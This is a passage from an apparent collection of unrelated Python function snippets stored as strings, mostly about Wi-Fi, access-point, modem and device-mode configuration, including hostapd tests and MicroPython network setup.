\\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[discovery_method]\n return msg\n\n else:\n if self.mac_to_vlan[ap_mac] == self.zd_vlan:\n if conn_mode_in_ap != \"l2\":\n msg = (\"The connection mode was %s instead of L2 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n if 
apmgrinfo['Discover Director By'] not in discovery_reason[\"l2\"]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % \\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[\"l2\"]\n return msg\n\n else:\n if conn_mode_in_ap != \"l3\":\n msg = (\"The connection mode was %s instead of L3 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n return \"\"", "def handle_onoff_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n payload_on: str = self._config[CONF_PAYLOAD_ON]\n payload_off: str = self._config[CONF_PAYLOAD_OFF]\n\n if payload == \"True\":\n payload = payload_on\n elif payload == \"False\":\n payload = payload_off\n\n if payload == payload_on:\n setattr(self, attr, True)\n elif payload == payload_off:\n setattr(self, attr, False)\n else:\n _LOGGER.error(\"Invalid %s mode: %s\", attr, payload)\n\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def _get_state(self):\n fw_wp_en = (self._interface.get('fw_wp_en') == 'on')\n fw_wp = (self._interface.get('fw_wp') == 'on')\n if fw_wp_en:\n return self._STATE_FORCE_ON if fw_wp else self._STATE_FORCE_OFF\n else:\n return self._STATE_ON if fw_wp else self._STATE_OFF", "def setMode(self, request, context):\n \n self.vehicle.mode = VehicleMode(str(request.mode))\n self.vehicle.wait_ready('mode')\n \n return droneconnect_pb2.Null()", "def connect_to_wifi_network(SSID,Passphrase,security_mode):\r\n read_outputDict={}\r\n read_outputDict[\"status\"]=''\r\n #default path to connect wifi\r\n script_path=\"/usr/local/autotest/cros/scripts\"\r\n # os.chdir() is used to change dir to wifi script path\r\n change_dir = os.chdir(script_path)\r\n #cmd is used to connect to SSID with/without passphrase\r\n connect_cmd=\"./wifi connect \"+ SSID +\" \"+Passphrase +\" \"+ security_mode +\" >\" + \"status.txt\"\r\n #Popen then cmd and get th output to validate whether is connected or not\r\n get_output=subprocess.Popen(connect_cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True) \r\n \"\"\"if get_output.stderr:\r\n raise error.TestFail(\"Failed to connect to network\",SSID)\r\n else:\r\n print(\"Error \",get_output.stderr.readlines()) \"\"\" \r\n time.sleep(Delay_time)", "def IsWirelessUp(self):\n return self.wifi.IsUp()", "def SetOperateMode(self):\n handler = self.get_command_object(\"SetOperateMode\")\n handler()", "def setAdhocParameters(self, host, mode, **params):\n self.mode = mode\n latency = 10\n self.host = host\n #delay = 5 * distance\n try:\n options = dict( params )\n self.interface = options[ 'interface' ]\n except: \n self.interface = 'wlan0'\n \n bandwidth = wifiParameters.set_bw(mode)\n #self.host.cmd(host, \"tc qdisc replace dev %s-%s root netem rate %.2fmbit latency %.2fms delay %.2fms\" % (host, self.interface, rate, latency, delay)) \n self.host.cmd(\"tc qdisc add dev %s-%s root tbf rate %smbit latency %sms burst 1540\" % (str(host), self.interface, bandwidth, latency))", "def init_wlan_ap():\n\n print('WLAN: AP mode')\n wlan.init(mode=WLAN.AP,\n ssid='ttn-be-mapper',\n auth=(WLAN.WPA2, 'reppam-eb-ntt'),\n channel=7,\n antenna=WLAN.INT_ANT)", "def connect(self):\n # check if network is connected. 
If yes: return, finished\n # 2019-0801 changed: if self._wlan.isconnected():\n if self.isconnected:\n if USE_DEBUG:\n print('WLAN already connected')\n return self._wlan.ifconfig()\n\n # activate Wifi interface\n if self._wlan.active() is False:\n self._wlan.active(True)\n # scan available networks for the required one\n nets = self._wlan.scan()\n for net in nets:\n ssid = net[0]\n if ssid == bytearray(self._config['SSID']): # must use bytearray!\n if USE_DEBUG:\n print(\"Startup WiFi ...\" + self._config['SSID'])\n # specify if static or dynamic IP is requested\n # STATIC IP: an IP is given\n # DYNAMIC IP: None\n if self._config['STATIC_IP'] is not '':\n if USE_DEBUG:\n print('WifiManager::Static IP configuration')\n # configure network for static IP\n self._wlan.ifconfig((self._config['STATIC_IP'],\n self._config['MASKER'],\n self._config['GATEWAY_IP'],\n self._config['DNS']))\n\n # connect to SSID... either for STATIC or DYNAMIC IP\n self._wlan.connect(self._config['SSID'],\n self._config['PASSWRD'])\n while not self.isconnected:\n idle() # save power while waiting\n time.sleep_ms(100) # give it some time\n if USE_DEBUG:\n print(\"Network '{}' connection succeeded!\".format(ssid))\n break\n\n # check connection, if not succesfull: raise exception\n if not self._wlan.active():\n raise exception('Network {0} not found.'.format(ssid))\n\n # returns network configuration...\n # although 'myPy.local' should work on MacOS X (Bonjour)\n return self._wlan.ifconfig()", "def using_network(ssid, password, antenna=0):\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n print('connecting to network...')\n sta_if.active(True)\n sta_if.config(antenna=antenna) # select antenna, 0=chip, 1=external\n sta_if.connect(ssid, password)\n while not sta_if.isconnected():\n # Check the status\n status = sta_if.status()\n # Constants aren't implemented for PYBD as of MicroPython v1.13.\n # From: https://github.com/micropython/micropython/issues/4682\n # 'So \"is-connecting\" is defined as s.status() in (1, 2) and \"is-connected\" is defined as s.status() == 3.'\n #\n if status <= 0:\n # Error States?\n return False\n #if ((status == network.WLAN.STAT_IDLE) or (status == network.WLAN.STAT_WRONG_PASSWORD)\n # or (status == network.WLAN.STAT_NO_AP_FOUND) or (status == network.WLAN.STAT_CONNECT_FAIL)):\n # Problems so return\n # return False\n\n print('network config:', sta_if.ifconfig())\n return True", "def configure_ap_connection_mode(self, ap_mac, mode, discovery_method = \"\", undo_reboot = False):\n if not self.components.has_key(\"L3Switch\"):\n raise Exception(\"There was not any managed switch present in the testbed\")\n\n logging.debug(\"The AP '%s' VLAN: %s\" % (ap_mac, self.mac_to_vlan[ap_mac]))\n logging.debug(\"The ZD VLAN: %s\" % self.zd_vlan)\n logging.debug(\"Expected connection mode: %s\" % mode.upper())\n\n ap_obj = self.mac_to_ap[ap_mac]\n rebooted = False\n mode = mode.lower()\n discovery_method = discovery_method.lower()\n logging.info(\"New connection mode: '%s' - discovery method: '%s'\" % \\\n (mode, discovery_method))\n\n if discovery_method in [\"fixed-pri\", \"fixed-sec\"]:\n if discovery_method == \"fixed-pri\":\n ip1 = self.zd.ip_addr\n ip2 = \"\"\n\n else:\n ip1 = \"1.1.1.1\"\n ip2 = self.zd.ip_addr\n\n logging.info(\"Configure director info on the AP '%s' to '%s' and '%s'\" % \\\n (ap_mac, ip1, ip2))\n\n ap_obj.set_director_info(ip1, ip2)\n logging.info(\"Reboot the AP to make the new change take effect\")\n ap_obj.reboot(login=False)\n rebooted = 
True\n\n else:\n logging.info(\"Get current director information on the AP\")\n zd_cfg_on_ap = ap_obj.get_director_cfg()\n\n if discovery_method in [\"dns\", \"dhcp\"]:\n logging.info(\"Reset AP's configuration to factory default in order to \\\n clear the ZD record\")\n\n # Modified by Serena Tan.2010.11.12.\n # To correct the argument.\n# ap_obj.set_factory(reboot=False)\n ap_obj.set_factory(login=False)\n\n if zd_cfg_on_ap[\"pri_zd_ip\"] or zd_cfg_on_ap[\"sec_zd_ip\"]:\n logging.info(\"Clear director information on the AP\")\n ap_obj.set_director_info(ip1 = \"\", ip2 = \"\")\n ap_obj.reboot(login=False)\n rebooted = True\n\n if discovery_method and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.reboot(login=False)\n rebooted = True\n\n if mode == \"l3\" and self.mac_to_vlan[ap_mac] == self.zd_vlan:\n if not undo_reboot and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.set_factory(login=False)\n # JLIN@08102010 no need to reboot since set_factory already included reboot procedure\n #ap_obj.reboot(login=False)\n rebooted = True\n\n logging.info(\"Move the AP from VLAN %s to VLAN %s\" % \\\n (self.mac_to_vlan[ap_mac], self.remote_vlan))\n\n self.components[\"L3Switch\"].remove_interface_from_vlan(\n self.mac_to_port[ap_mac],\n self.mac_to_vlan[ap_mac])\n\n self.components[\"L3Switch\"].add_interface_to_vlan(\n self.mac_to_port[ap_mac],\n self.remote_vlan)\n\n self.mac_to_vlan[ap_mac] = self.remote_vlan\n\n elif mode == 'l2':\n if self.mac_to_vlan[ap_mac] != self.zd_vlan:\n if not undo_reboot and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.set_factory(login=False)\n # JLIN@08102010 no need to reboot since set_factory already included reboot procedure\n #ap_obj.reboot(login=False)\n rebooted = True\n\n logging.info(\"Move the AP from VLAN %s to VLAN %s\" % \\\n (self.mac_to_vlan[ap_mac], self.zd_vlan))\n\n self.components[\"L3Switch\"].remove_interface_from_vlan(\n self.mac_to_port[ap_mac],\n self.mac_to_vlan[ap_mac])\n\n self.components[\"L3Switch\"].add_interface_to_vlan(\n self.mac_to_port[ap_mac],\n self.zd_vlan)\n\n self.mac_to_vlan[ap_mac] = self.zd_vlan\n\n else:\n rebooted = self.reboot_ap_if_not_l2_mode(ap_mac)\n\n if not undo_reboot and rebooted:\n logging.info(\"Try to reconnect to the AP after it is rebooted\")\n\n base_time = time.time()\n while True:\n try:\n # JLIN@08102010\n # fixed ap ssh error while ap is not boot up for sshd running\n # if ap from l2 change to l3, ap is rebooted by script\n # if ap already keep on l3 status, ap isn't rebooted by script\n logging.debug(\"Waiting AP reboot\")\n time.sleep(300) #\n logging.info(\"Detect the new IP leased of the AP at new VLAN\")\n self._detect_ap_dynamic_addresses([ap_mac])\n\n logging.debug(\"MAC to IP table: %s\" % self.mac_to_ip)\n\n ap_obj.ip_addr = self.mac_to_ip[ap_mac]\n logging.info(\"Try to connect to the AP at new IP %s\" % \\\n self.mac_to_ip[ap_mac])\n ap_obj.verify_component()\n break\n\n except:\n if time.time() - base_time > 360:\n msg = \"Unable to reconnect to the AP '%s' after making it \\\n become %s AP\" % (ap_mac, mode)\n raise Exception(msg)\n\n time.sleep(10)\n logging.info(\"Fail. 
Give it another try\")", "def _set_screen_type(self, **kwargs):\n self.show_ap = kwargs.get('ap', False)\n\tself.show_station = kwargs.get('station', False)\n self.sort_by = None\n self.sort_values = {}\n self.cmp_reverse = False\n if self.show_ap:\n self.toggle_val = 'known'\n self.toggle_check = False\n self._add_sort_value('bssid', 'ap.bssid', False)\n self._add_sort_value('signal', 'traffic.avg_sig', True)\n self._add_sort_value('crypt', 'ap.crypto', True)\n elif self.show_station:\n self.toggle_val = 'connected'\n self.toggle_check = False\n #TODO change after card station\n self._add_sort_value('bssid', 'station.bssid', False)\n self._add_sort_value('ap', 'station.ap_bssid', True)", "def get_wifi(self):\n return self._wifi", "def start(self, bs, nextIface, ssid, mode, channel, \n country_code, auth_algs, wpa, wpa_key_mgmt, rsn_pairwise, wpa_passphrase):\n self.apName.append(bs)\n self.apSSID[str(bs)] = ssid\n self.apMode[str(bs)] = mode\n self.cmd = (\"echo \\'\")\n \"\"\"General Configurations\"\"\" \n self.cmd = self.cmd + (\"interface=%s\" % nextIface) # the interface used by the AP\n \"\"\"Not using at the moment\"\"\"\n self.cmd = self.cmd + (\"\\ndriver=nl80211\")\n if(ssid!=None):\n self.cmd = self.cmd + (\"\\nssid=%s\" % ssid) # the name of the AP\n if(mode==\"g\" or mode==\"n\"):\n self.cmd = self.cmd + (\"\\nhw_mode=g\") \n elif (mode==\"b\"):\n self.cmd = self.cmd + (\"\\nhw_mode=b\") \n elif (mode==\"a\"):\n self.cmd = self.cmd + (\"\\nhw_mode=a\")\n if(channel!=None):\n self.cmd = self.cmd + (\"\\nchannel=%s\" % channel) # the channel to use \n if(mode==\"ac\"):\n self.cmd = self.cmd + (\"\\nwme_enabled=1\") \n self.cmd = self.cmd + (\"\\nieee80211ac=1\")\n self.cmd = self.cmd + (\"\\nwme_enabled=1\") \n self.cmd = self.cmd + (\"\\nieee80211n=1\")\n if(mode==\"n\"):\n self.cmd = self.cmd + (\"\\nht_capab=[HT40+][SHORT-GI-40][DSSS_CCK-40]\")\n \n #Not used yet!\n if(country_code!=None):\n self.cmd = self.cmd + (\"\\ncountry_code=%s\" % country_code) # the country code\n if(auth_algs!=None):\n self.cmd = self.cmd + (\"\\nauth_algs=%s\" % auth_algs) # 1=wpa, 2=wep, 3=both\n if(wpa!=None):\n self.cmd = self.cmd + (\"\\nwpa=%s\" % wpa) # WPA2 only\n if(wpa_key_mgmt!=None):\n self.cmd = self.cmd + (\"\\nwpa_key_mgmt=%s\" % wpa_key_mgmt ) \n if(rsn_pairwise!=None):\n self.cmd = self.cmd + (\"\\nrsn_pairwise=%s\" % rsn_pairwise) \n if(wpa_passphrase!=None):\n self.cmd = self.cmd + (\"\\nwpa_passphrase=%s\" % wpa_passphrase) \n \n #elif(len(self.baseStationName)>self.countAP and len(self.baseStationName) != 1):\n # \"\"\"From AP2\"\"\"\n # self.cmd = self.apcommand\n #self.cmd = self.cmd + \"\\n\"\n # self.cmd = self.cmd + (\"\\nbss=%s\" % self.newapif[self.nextIface]) # the interface used by the AP\n # if(self.ssid!=None):\n # self.cmd = self.cmd + (\"\\nssid=%s\" % self.ssid ) # the name of the AP\n #self.cmd = self.cmd + (\"\\nssid=%s\" % self.ssid) # the name of the AP\n # if(self.auth_algs!=None):\n # self.cmd = self.cmd + (\"\\nauth_algs=%s\" % self.auth_algs) # 1=wpa, 2=wep, 3=both\n # if(self.wpa!=None):\n # self.cmd = self.cmd + (\"\\nwpa=%s\" % self.wpa) # WPA2 only\n # if(self.wpa_key_mgmt!=None):\n # self.cmd = self.cmd + (\"\\nwpa_key_mgmt=%s\" % self.wpa_key_mgmt ) \n # if(self.rsn_pairwise!=None):\n # self.cmd = self.cmd + (\"\\nrsn_pairwise=%s\" % self.rsn_pairwise) \n # if(self.wpa_passphrase!=None):\n # self.cmd = self.cmd + (\"\\nwpa_passphrase=%s\" % self.wpa_passphrase) \n # self.countAP = len(self.baseStationName)\n # self.apcommand = \"\"\n return 
self.cmd", "def _turn_on_dev_mode(self):\n if self._device is not None:\n self._char_write(self._BLE_SERVICE_ANTI_DOS,\n [ord(c) for c in self._ANTI_DOS_MESSAGE])\n self._char_write(self._BLE_SERVICE_TX_POWER,\n [self._TX_POWER_VALUE])\n # Sending 0x01 to the wake service wakes the sphero.\n self._char_write(self._BLE_SERVICE_WAKE, [0x01])", "def choose_mode():\n print('Do you want to play in terminal/debug mode (\"t\") or in visual mode (\"v\")?')\n while True:\n user_input = input()\n if user_input.lower() == \"t\":\n print('You chose for terminal mode, the game will start now')\n return False\n elif user_input.lower() == \"v\":\n print('You chose for visual mode, the game will start in a new window')\n return True\n else:\n print(f'Your input: {user_input}, is not recognised, please try')", "def is_on(self) -> bool:\n return self._zone.data[\"mode\"] == \"override\" and self._zone.data[\"setpoint\"]", "def power_mode(self):\n if not self.eve_type.is_upwell_structure:\n return None\n\n if self.fuel_expires_at and self.fuel_expires_at > now():\n return self.PowerMode.FULL_POWER\n\n elif self.last_online_at:\n if self.last_online_at >= now() - timedelta(days=7):\n return self.PowerMode.LOW_POWER\n else:\n return self.PowerMode.ABANDONED\n\n elif self.state in {self.State.ANCHORING, self.State.ANCHOR_VULNERABLE}:\n return self.PowerMode.LOW_POWER\n\n else:\n return self.PowerMode.LOW_ABANDONED", "def _wireless_autoconnect(self):\n print \"No wired connection present, attempting to autoconnect\" + \\\n \"to wireless network\"\n if self.GetWirelessInterface() is None:\n print 'Autoconnect failed because wireless interface returned None'\n return\n for x, network in enumerate(self.LastScan):\n if bool(network[\"has_profile\"]):\n if self.debug_mode:\n print network[\"essid\"] + ' has profile'\n if bool(network.get('automatic')):\n print 'trying to automatically connect to...' + \\\n network[\"essid\"]\n self.ConnectWireless(x)\n time.sleep(1)\n return\n print \"Unable to autoconnect, you'll have to manually connect\"", "def _on_autonomous_enable(self) -> None:\n\n # XXX: FRC Dashboard compatibility\n # -> if you set it here, you're stuck using it. 
The FRC Dashboard\n # doesn't seem to have a default (nor will it show a default),\n # so the key will only get set if you set it.\n auto_mode = wpilib.SmartDashboard.getString(\"Auto Selector\", None)\n if auto_mode is not None and auto_mode in self.modes:\n logger.info(\"Using autonomous mode set by LabVIEW dashboard\")\n self.active_mode = self.modes[auto_mode]\n else:\n self.active_mode = self.chooser.getSelected()\n\n if self.active_mode is not None:\n logger.info(\"Enabling '%s'\", self.active_mode.MODE_NAME)\n self.active_mode.on_enable()\n else:\n logger.warning(\n \"No autonomous modes were selected, not enabling autonomous mode\"\n )", "def maintenance_mode():\n pass", "def _update_instance_type_for_local_mode(self):\n self.config[\"resource\"][\"private_resource\"][\"hosting_fleet\"][\"instance_type\"] = \"local\"\n self.config[\"resource\"][\"private_resource\"][\"training_fleet\"][\"instance_type\"] = \"local\"\n self.config[\"resource\"][\"private_resource\"][\"evaluation_fleet\"][\"instance_type\"] = \"local\"", "def do_set_online(self):\n controller_name = self._tel.csp.controller\n controller = con_config.get_device_proxy(controller_name, fast_load=True)\n self._log(f\"Setting adminMode for {controller_name} to '0' (ONLINE)\")\n controller.write_attribute(\"adminmode\", 0)\n for index in range(1, self.nr_of_subarrays + 1):\n subarray_name = self._tel.csp.subarray(index)\n subarray = con_config.get_device_proxy(subarray_name, fast_load=True)\n self._log(f\"Setting adminMode for {subarray_name} to '0' (ONLINE)\")\n subarray.write_attribute(\"adminmode\", 0)", "def test_ap_hs20_network_preference(dev, apdev):\n bssid = apdev[0]['bssid']\n params = hs20_ap_params()\n hostapd.add_ap(apdev[0]['ifname'], params)\n\n dev[0].hs20_enable()\n values = { 'realm': \"example.com\",\n 'username': \"hs20-test\",\n 'password': \"password\",\n 'domain': \"example.com\" }\n dev[0].add_cred_values(values)\n\n id = dev[0].add_network()\n dev[0].set_network_quoted(id, \"ssid\", \"home\")\n dev[0].set_network_quoted(id, \"psk\", \"12345678\")\n dev[0].set_network(id, \"priority\", \"1\")\n dev[0].request(\"ENABLE_NETWORK %s no-connect\" % id)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\"], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if bssid not in ev:\n raise Exception(\"Unexpected network selected\")\n\n bssid2 = apdev[1]['bssid']\n params = hostapd.wpa2_params(ssid=\"home\", passphrase=\"12345678\")\n hostapd.add_ap(apdev[1]['ifname'], params)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\",\n \"INTERWORKING-ALREADY-CONNECTED\" ], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if \"INTERWORKING-ALREADY-CONNECTED\" in ev:\n raise Exception(\"No roam to higher priority network\")\n if bssid2 not in ev:\n raise Exception(\"Unexpected network selected\")", "def networkMode(self):\n\n response = self.at.sendCommand(\"AT+CEREG?\")\n\n # If we failed to query the network mode, that's a paddlin'\n if not response:\n raise modem.AtError(response, \"Failed to query network mode\")\n\n lines = response.lines\n\n if len(lines) < 1:\n raise modem.AtError(response, \"Invalid network mode response\")\n\n fields = lines[0].split(\",\")\n\n # If there isn't at least the prefix and the current mode, that's a\n # paddlin'\n if len(fields) < 2:\n raise modem.AtError(response, \"Invalid network mode response\")\n\n try:\n return 
int(fields[1])\n\n except ValueError:\n raise modem.AtError(response, \"Invalid network mode\")", "def _is_device_active(self):\n return self.power_mode == STATE_ON", "def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "async def change_heatmode(self, newmode):\n if not self.connected:\n return\n\n # check for sanity\n if newmode > 2:\n return\n\n # this is a toggle switch, not on/off\n if self.heatmode == newmode:\n return\n\n # what we know:\n data = bytearray(9)\n data[0] = M_START\n data[1] = 7\n data[2] = mtypes[BMTS_CONTROL_REQ][0]\n data[3] = mtypes[BMTS_CONTROL_REQ][1]\n data[4] = mtypes[BMTS_CONTROL_REQ][2]\n data[5] = C_HEATMODE\n data[6] = 0x00 # who knows?\n data[7] = messages.Message.crc(data[1:7])\n data[8] = M_END\n\n # You can't put the spa in REST, it can BE in rest, but you cannot\n # force it into rest. It's a tri-state, but a binary switch.\n\n # calculate how many times to push the button\n if newmode == self.HEATMODE_READY:\n if (self.heatmode == self.HEATMODE_REST or\n self.heatmode == self.HEATMODE_RNR):\n self.writer.write(data)\n await self.writer.drain()\n await asyncio.sleep(0.5)\n\n if newmode == self.HEATMODE_REST or newmode == self.HEATMODE_RNR:\n if self.heatmode == self.HEATMODE_READY:\n self.writer.write(data)\n await self.writer.drain()\n await asyncio.sleep(0.5)", "def _toggle_server(self):\r\n\t\t_logger.debug(\"Toggle server button is pressed.\")\r\n\r\n\t\tif not comm_server.is_running():\r\n\t\t\tserver_ip = self.children[\"entry_IP\"].get()\r\n\t\t\tserver_port = int(self.children[\"entry_port\"].get())\r\n\t\t\tif not comm_server.start_server(server_ip, server_port):\r\n\t\t\t\treturn\r\n\t\t\tself._save_server_config(server_ip, server_port)\r\n\r\n\t\t\tself.children[\"btn_toggle_server\"].config(text = \"關閉伺服器\")\r\n\t\t\tself._update_connection_num(\"\")\r\n\t\telse:\r\n\t\t\tcomm_server.stop_server()\r\n\t\t\tself.children[\"btn_toggle_server\"].config(text = \"啟動伺服器\")\r\n\t\t\tself.children[\"label_connections\"].config(text = \"連接數: -/-\")", "def networkMode(self, networkMode):\n\n # Setting the network mode can take a bit of time, so give it 10 seconds\n # to finish\n response = self.at.sendCommand(f\"AT+CFUN={networkMode}\", timeout = 10)\n\n if not response:\n raise modem.AtError(response, \"Failed to set network mode\")", "def ethernet_on(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_on(self.ethernet_port_number)", "def set_addressing_mode(mode):\n send_command(0x20)\n send_command(mode)", "def test_ap_hs20_network_preference2(dev, apdev):\n bssid2 = apdev[1]['bssid']\n params = hostapd.wpa2_params(ssid=\"home\", passphrase=\"12345678\")\n hostapd.add_ap(apdev[1]['ifname'], params)\n\n dev[0].hs20_enable()\n values = { 'realm': \"example.com\",\n 'username': \"hs20-test\",\n 'password': \"password\",\n 'domain': \"example.com\",\n 'priority': \"1\" }\n dev[0].add_cred_values(values)\n\n id = dev[0].add_network()\n dev[0].set_network_quoted(id, \"ssid\", \"home\")\n dev[0].set_network_quoted(id, \"psk\", \"12345678\")\n dev[0].request(\"ENABLE_NETWORK %s no-connect\" % id)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\"], timeout=15)\n if ev is None:\n 
raise Exception(\"Connection timed out\")\n if bssid2 not in ev:\n raise Exception(\"Unexpected network selected\")\n\n bssid = apdev[0]['bssid']\n params = hs20_ap_params()\n hostapd.add_ap(apdev[0]['ifname'], params)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\",\n \"INTERWORKING-ALREADY-CONNECTED\" ], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if \"INTERWORKING-ALREADY-CONNECTED\" in ev:\n raise Exception(\"No roam to higher priority network\")\n if bssid not in ev:\n raise Exception(\"Unexpected network selected\")", "def is_host_on(self):\n status = False\n cmd = \"/usr/local/bin/wedge_power.sh status\"\n data = run_shell_cmd(cmd)\n Logger.info(\"[FSCD Testing] Executing cmd= [{}]\".format(cmd))\n Logger.info(\"[FSCD Testing] Received data= [{}]\".format(data))\n if \"on\" in data:\n status = True\n Logger.info(\"[FSCD Testing] userver power status {}\".format(status))\n return status", "async def test_set_away_mode_on(opp):\n await common.async_set_away_mode(opp, True, ENTITY_WATER_HEATER)\n state = opp.states.get(ENTITY_WATER_HEATER)\n assert state.attributes.get(\"away_mode\") == \"on\"", "def setMode(self, newmode=None):\n if newmode==None and self.mode: return\n \n # find it in my dictionary\n for k,v in self.items():\n if k.lower() == \"mode\":\n if newmode:\n self.mode = newmode\n self[k] = str(self.mode)\n else:\n self.mode = int(v)\n \n # it wasn't in the dictionary\n if newmode and not self.mode:\n self.mode = newmode\n self[\"MODE\"] = str(self.mode)\n \n if not self.mode:\n raise NetworkException(\"Supplink mode not set: \" + str(self))", "def spoof(self, mac, air=False):\n\t\t\n\t\tif air:\n\t\t\tos.system(\n\t\t\t\t'sudo '\n\t\t\t\t'/System/Library/PrivateFrameworks'\n\t\t\t\t'/Apple80211.framework/Versions'\n\t\t\t\t'/Current/Resources/airport -z'\n\t\t\t)\n\t\t\n\t\t_status = os.system('sudo ifconfig %s ether %s' % (self.id, mac))\n\t\t\n\t\treturn 'Interface %s (%s) => (%s)' % (self.id, self.mac, mac)", "async def async_turn_on(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.force_update()", "def is_on(self):\n return self._mower_status in [\n STATUS_EXECUTING_START, STATUS_OK_CHARGING,\n STATUS_OK_CUTTING, STATUS_OK_LEAVING, STATUS_OK_SEARCHING, STATUS_OK_CUTTING_MANUAL]", "async def async_step_wifi(self, info: Optional[dict] = None):\n errors = {}\n if info is not None:\n try:\n serial, credential, device_type = get_mqtt_info_from_wifi_info(\n info[CONF_SSID], info[CONF_PASSWORD]\n )\n except DysonFailedToParseWifiInfo:\n errors[\"base\"] = \"cannot_parse_wifi_info\"\n else:\n device_type_name = DEVICE_TYPE_NAMES[device_type]\n _LOGGER.debug(\"Successfully parse WiFi information\")\n _LOGGER.debug(\"Serial: %s\", serial)\n _LOGGER.debug(\"Device Type: %s\", device_type)\n _LOGGER.debug(\"Device Type Name: %s\", device_type_name)\n try:\n data = await self._async_get_entry_data(\n serial,\n credential,\n device_type,\n device_type_name,\n info.get(CONF_HOST),\n )\n except InvalidAuth:\n errors[\"base\"] = \"invalid_auth\"\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except CannotFind:\n 
errors[\"base\"] = \"cannot_find\"\n else:\n return self.async_create_entry(\n title=device_type_name,\n data=data,\n )\n\n info = info or {}\n return self.async_show_form(\n step_id=\"wifi\",\n data_schema=vol.Schema(\n {\n vol.Required(CONF_SSID, default=info.get(CONF_SSID, \"\")): str,\n vol.Required(\n CONF_PASSWORD, default=info.get(CONF_PASSWORD, \"\")\n ): str,\n vol.Optional(CONF_HOST, default=info.get(CONF_HOST, \"\")): str,\n }\n ),\n errors=errors,\n )", "def SetDefaultPerfMode(self):\n if not self._device.old_interface.IsRootEnabled():\n return\n product_model = self._device.GetProp('ro.product.model')\n governor_mode = {\n 'GT-I9300': 'pegasusq',\n 'Galaxy Nexus': 'interactive',\n 'Nexus 4': 'ondemand',\n 'Nexus 7': 'interactive',\n 'Nexus 10': 'interactive'\n }.get(product_model, 'ondemand')\n self._SetScalingGovernorInternal(governor_mode)\n self._ForceAllCpusOnline(False)", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def in_easy_mode(mode: str) -> bool:\n return mode == EASY", "def on_the_network_page_click_on_setting_on_the_global_configuration_card(driver):\n assert wait_on_element(driver, 7, '//h1[contains(.,\"Network\")]')\n assert wait_on_element(driver, 5, '//button[@ix-auto=\"button__globalSettings\"]', 'clickable')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__globalSettings\"]').click()", "def ConnectWifi(SSID, pwd):\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n DisplayMsg('Connecting to network...',8)\n sta_if.active(True)\n sta_if.connect(SSID, pwd)\n while not sta_if.isconnected():\n pass\n return True", "def mode_manual(self):\n if self.__check_mode_change():\n self.communications.set_status(\"Piloting Bot\")\n self.__check_move()", "def wpsConnect():\n \n SSID = \"none\"\n # scan networks on interface wlan0, to see some nice networks\n subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"scan\"]) \n sleep(1);\n \n #get and decode results\n wpa = subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"scan_results\"]).decode(\"UTF-8\")\n \n #parse response to get MAC address of router that has WPS-PBC state\n active_spot_reg = re.search(\"(([\\da-f]{2}:){5}[\\da-f]{2})(.*?)\\[WPS-PBC\\]\", wpa)\n \n #check if found any\n if not (active_spot_reg is None):\n if active_spot_reg.group(1):\n \n #connect via wps_pbc\n subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"wps_pbc\", active_spot_reg.group(1)])\n SSID = active_spot_reg.group(5)\n \n print(active_spot_reg.group(1) + \" \" + SSID)\n print(wpa)\n \n return(SSID)", "def enable_gprs(self):\n if not has_internet():\n try:\n if not self.is_power_on():\n self.turn_on_modem()\n except TimeoutError:\n self.disable_gprs()\n self.turn_off_modem() # restart modem\n self.turn_on_modem()\n 